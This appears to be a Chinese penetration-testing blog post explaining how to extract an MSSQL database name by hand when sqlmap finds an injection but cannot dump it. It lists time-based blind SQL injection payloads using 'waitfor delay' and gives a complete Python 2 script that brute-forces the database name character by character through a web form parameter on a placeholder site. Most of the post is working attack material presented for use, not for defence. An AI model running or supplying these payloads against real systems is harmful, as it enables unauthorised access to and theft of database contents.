【实战】sqlmap显示有注入却无法爆出库名

sqlmap爆mssql数据库时采用的语句如下图:

从语句中不难看出,如果关键字select被“(非tamper绕过)处理”了,那sqlmap是无法爆出数据库的,这时我们可以使用原始的猜解法,

#判断数据库和用户名长度
'+if(len(db_name())=%s)+waitfor+delay+'0:0:5'--
'+if(len(user_name())=%s)+waitfor+delay+'0:0:5'--

#循环注出数据库和用户名
'+if(ascii(substring(db_name(),%s,1))=%s)+waitfor+delay+'0:0:5'--
'+if(ascii(substring(user_name(),%s,1))=%s)+waitfor+delay+'0:0:5'--

分享一个最近用的时间延迟盲注爆库名脚本(手工测下库名长度):

import urllib
import urllib2
import time
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'  } 
values={}
print 'Start to retrive database:'
user= ''

for i in range(1, 20):
    for payload in payloads:
        startTime=time.time()
        try:
            values['action']='getvideo'
            values['pc_mob']='GP'
            values['years']="' if(ascii(substring(db_name(),%s,1))=%s) waitfor delay '0:0:5'--" % (str(i),ord(payload))
            data = urllib.urlencode(values)
            url = "http://www.xxx.com/operation.aspx"
            geturl = url+'?'+data            
            request = urllib2.Request(geturl,headers=header)
            response = urllib2.urlopen(request)
            if time.time()-startTime>5:
                user+=payload
                print 'the database is:'+user
                break
            else:
                print 'dumping database...'
        except Exception,e:
            print e

 

posted @ 2018-08-23 15:48  Carrypan  阅读(5669)  评论(0编辑  收藏  举报